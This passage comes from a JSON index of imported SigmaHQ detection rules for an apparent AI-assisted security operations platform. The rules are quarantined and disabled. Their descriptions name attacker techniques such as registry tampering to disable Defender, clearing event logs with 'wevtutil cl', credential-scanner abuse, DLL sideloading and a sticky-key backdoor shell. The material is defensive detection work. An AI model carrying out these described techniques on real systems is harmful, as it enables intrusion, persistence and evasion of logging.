"detections/sigma-imports/_quarantine/disable-windows-defender-functionalities-via-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0eb46774-f1ab-4a74-8238-1155855f2263", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" } }, { "id": "sigmahq-sigma-0ed75b9c-c73b-424d-9e7d-496cd565fbe0", "type": "detection", "name": "Security Software Discovery - MacOs", "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-software-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" } }, { "id": "sigmahq-sigma-0ed99dda-6a35-11ef-8c99-0242ac120002", "type": "detection", "name": "Attempts of Kerberos Coercion Via DNS SPN Spoofing", "description": "Detects the presence of \"UWhRC....AAYBAAAA\" pattern in command line.\nThe pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\nAttackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\nIt is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\nto spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.\nIf you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,\nor checking for the presence of such records through the `nslookup` command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/attempts-of-kerberos-coercion-via-dns-spn-spoofing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ed99dda-6a35-11ef-8c99-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml" } }, { "id": "sigmahq-sigma-0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "type": "detection", "name": "HybridConnectionManager Service Installation", "description": "Rule to detect the Hybrid Connection Manager service installation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hybridconnectionmanager-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" } }, { "id": "sigmahq-sigma-0ef56343-059e-4cb6-adc1-4c3c967c5e46", "type": "detection", "name": "Suspicious Execution of Systeminfo", "description": "Detects usage of the \"systeminfo\" command to retrieve information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-systeminfo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml" } }, { "id": "sigmahq-sigma-0f017df3-8f5a-414f-ad6b-24aff1128278", "type": "detection", "name": "Suspicious Eventlog Clear", "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the Windows event logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-eventlog-clear.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f017df3-8f5a-414f-ad6b-24aff1128278", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" } }, { "id": "sigmahq-sigma-0f0450f3-8b47-441e-a31b-15a91dc243e2", "type": "detection", "name": "Potential DLL File Download Via PowerShell Invoke-WebRequest", "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-file-download-via-powershell-invoke-webrequest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml" } }, { "id": "sigmahq-sigma-0f06a3a5-6a09-413f-8743-e6cf35561297", "type": "detection", "name": "WMI Event Subscription", "description": "Detects creation of WMI event subscription persistence method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" } }, { "id": "sigmahq-sigma-0f16d9cf-0616-45c8-8fad-becc11b5a41c", "type": "detection", "name": "Renamed AutoHotkey.EXE Execution", "description": "Detects execution 
of a renamed autohotkey.exe binary based on PE metadata fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-autohotkey-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml" } }, { "id": "sigmahq-sigma-0f2468a2-5055-4212-a368-7321198ee706", "type": "detection", "name": "Activity from Infrequent Country", "description": "Detects when Microsoft Cloud App Security reports an activity occurring from a location that was not recently visited, or was never visited, by any user in the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-infrequent-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f2468a2-5055-4212-a368-7321198ee706", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml" } }, { "id": 
"sigmahq-sigma-0f60b28c-64dd-4e2c-9a63-5334d3e3a6e6", "type": "detection", "name": "Script Interpreter Spawning Credential Scanner - Windows", "description": "Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks).\nThis behavior is indicative of an attempt to find and steal secrets, as seen in the \"Shai-Hulud: The Second Coming\" campaign.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-interpreter-spawning-credential-scanner-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f60b28c-64dd-4e2c-9a63-5334d3e3a6e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_script_interpretor_spawn_credential_scanner.yml" } }, { "id": "sigmahq-sigma-0f63e1ef-1eb9-4226-9d54-8927ca08520a", "type": "detection", "name": "Admin User Remote Logon", "description": "Detect remote login by Administrator user (depending on internal pattern).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.001", "T1078.002", "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/admin-user-remote-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml" } }, { "id": "sigmahq-sigma-0f6da907-5854-4be6-859a-e9958747b0aa", "type": "detection", "name": "Potential DLL Injection Via AccCheckConsole", "description": "Detects the execution \"AccCheckConsole\" a command-line tool for verifying the accessibility implementation of an application's UI.\nOne of the tests that this checker can run are called \"verification routine\", which tests for things like Consistency, Navigation, etc.\nThe tool allows a user to provide a DLL that can contain a custom \"verification routine\". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the \"AccCheckConsole\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-injection-via-acccheckconsole.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f6da907-5854-4be6-859a-e9958747b0aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml" } }, { "id": "sigmahq-sigma-0f79c4d2-4e1f-4683-9c36-b5469a665e06", "type": "detection", "name": "Access of Sudoers File Content", "description": "Detects the execution of a 
text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-of-sudoers-file-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_process_reading_sudoers.yml" } }, { "id": "sigmahq-sigma-0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "type": "detection", "name": "Potential Privilege Escalation via Service Permissions Weakness", "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-via-service-permissions-weakness.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml" } }, { "id": "sigmahq-sigma-0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "type": "detection", "name": "Potential DLL Sideloading Using Coregen.exe", "description": "Detect usage of the \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-using-coregen-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_coregen.yml" } }, { "id": "sigmahq-sigma-0fadd880-6af3-4610-b1e5-008dc3a11b8a", "type": "detection", "name": "Potential Suspicious BPF Activity - Linux", "description": "Detects the presence of \"bpf_probe_write_user\" BPF helper-generated warning messages. 
Which could be a sign of suspicious eBPF activity on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-bpf-activity-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fadd880-6af3-4610-b1e5-008dc3a11b8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml" } }, { "id": "sigmahq-sigma-0fc35fc3-efe6-4898-8a37-0b233339524f", "type": "detection", "name": "Suspicious ScreenSave Change by Reg.exe", "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-screensave-change-by-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_reg_screensaver.yml" } }, { "id": "sigmahq-sigma-0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "type": "detection", "name": "Remote Schedule Task Lateral Movement via ATSvc", "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-lateral-movement-via-atsvc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" } }, { "id": "sigmahq-sigma-10018e73-06ec-46ec-8107-9172f1e04ff2", "type": "detection", "name": "Remote Server Service Abuse for Lateral Movement", "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-server-service-abuse-for-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10018e73-06ec-46ec-8107-9172f1e04ff2", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" } }, { "id": "sigmahq-sigma-100ef69e-3327-481c-8e5c-6d80d9507556", "type": "detection", "name": "Important Windows Eventlog Cleared", "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "100ef69e-3327-481c-8e5c-6d80d9507556", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml" } }, { "id": "sigmahq-sigma-1012f107-b8f1-4271-af30-5aed2de89b39", "type": "detection", "name": "Terminal Service Process Spawn", "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/terminal-service-process-spawn.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1012f107-b8f1-4271-af30-5aed2de89b39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml" } }, { "id": "sigmahq-sigma-10227522-8429-47e6-a301-f2b2d014e7ad", "type": "detection", "name": "Macos Remote System Discovery", "description": "Detects the enumeration of other remote systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-remote-system-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10227522-8429-47e6-a301-f2b2d014e7ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" } }, { "id": "sigmahq-sigma-1027d292-dd87-4a1a-8701-2abe04d7783c", "type": "detection", "name": "PSScriptPolicyTest Creation By Uncommon Process", "description": "Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. 
This file is usually generated by Microsoft Powershell to test against Applocker.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psscriptpolicytest-creation-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1027d292-dd87-4a1a-8701-2abe04d7783c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml" } }, { "id": "sigmahq-sigma-102e11e3-2db5-4c9e-bc26-357d42585d21", "type": "detection", "name": "Bulk Deletion Changes To Privileged Account Permissions", "description": "Detects when a user is removed from a privileged role. 
Bulk changes should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bulk-deletion-changes-to-privileged-account-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "102e11e3-2db5-4c9e-bc26-357d42585d21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml" } }, { "id": "sigmahq-sigma-10344bb3-7f65-46c2-b915-2d00d47be5b0", "type": "detection", "name": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI", "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. 
This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie-zonemap-setting-downgraded-to-mycomputer-zone-for-http-protocols-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10344bb3-7f65-46c2-b915-2d00d47be5b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml" } }, { "id": "sigmahq-sigma-104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "type": "detection", "name": "File Download Using ProtocolHandler.exe", "description": "Detects usage of \"ProtocolHandler\" to download files. 
Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-using-protocolhandler-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml" } }, { "id": "sigmahq-sigma-106d7cbd-80ff-4985-b682-a7043e5acb72", "type": "detection", "name": "Loading of Kernel Module via Insmod", "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loading-of-kernel-module-via-insmod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "106d7cbd-80ff-4985-b682-a7043e5acb72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_load_module_insmod.yml" } }, { "id": "sigmahq-sigma-1070db9a-3e5d-412e-8e7b-7183b616e1b3", "type": "detection", "name": "Persistence Via Sticky Key Backdoor", "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-sticky-key-backdoor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml" } }, { "id": "sigmahq-sigma-10b97915-ec8d-455f-a815-9a78926585f6", "type": "detection", "name": "Kubernetes Rolebinding Modification", "description": "Detects when a Kubernetes Rolebinding is created or modified.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-rolebinding-modification.yaml", "quarantine_reason": "imported rule; 
